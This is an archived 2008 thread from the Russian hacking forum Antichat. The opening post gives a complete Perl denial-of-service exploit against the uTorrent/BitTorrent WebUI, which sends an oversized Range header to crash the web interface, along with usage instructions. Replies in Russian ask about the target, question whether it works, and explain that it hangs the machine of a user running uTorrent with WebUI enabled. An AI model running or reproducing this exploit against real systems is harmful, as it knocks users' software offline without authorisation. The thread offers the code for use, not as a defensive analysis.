Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit (https://forum.antichat.xyz/showthread.php?t=75396)

YoYo Factory 29.06.2008 21:35

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
 
uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit

Код:

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit       

#!/usr/bin/perl
# uTorrent / BitTorrent  WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl <url> <port> <user:pass>
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;
use MIME::Base64;

if(@ARGV < 3)
{ &usage; }

($host,$ref) = split(/\//,$ARGV[0]);

$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);

print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";



sub usage
{
        print "usage $0 <url> <port> <user:pass>\n".
                  "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
        exit;
}

© Astalavista.com

Сорри если не туда запостил, переместите если не туда плиз!

geforse 30.06.2008 10:53

Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?

P(i)n*Fl0p1 30.06.2008 10:59

Цитата:

Сообщение от geforse
Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?

Эксплоит для поднятия ранга\репы на юторент трекерах?


А работает ли?ты проверял сам?

YoYo Factory 30.06.2008 11:59

Цитата:

Сообщение от geforse
Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?

Написано же HTTP 1.7.7

YoYo Factory 30.06.2008 12:01

Цитата:

Сообщение от P(i)n*Fl0p1
Эксплоит для поднятия ранга\репы на юторент трекерах?


А работает ли?ты проверял сам?

Перед тем как спрашивать лучше сам проверил бы! ;)
Если выложил значит работает!
Может кстати сейчас не будет, не знаю может админы прикрыл, но к тому моменту, когда создал тему, работала!

gisTy 04.07.2008 22:45

вообще то если уж на то пошло, то это скрипт который подвешивает мащину юзера, на которой стоит uTorrent с WebUI (панель управления клиентом через веб)...


Время: 22:43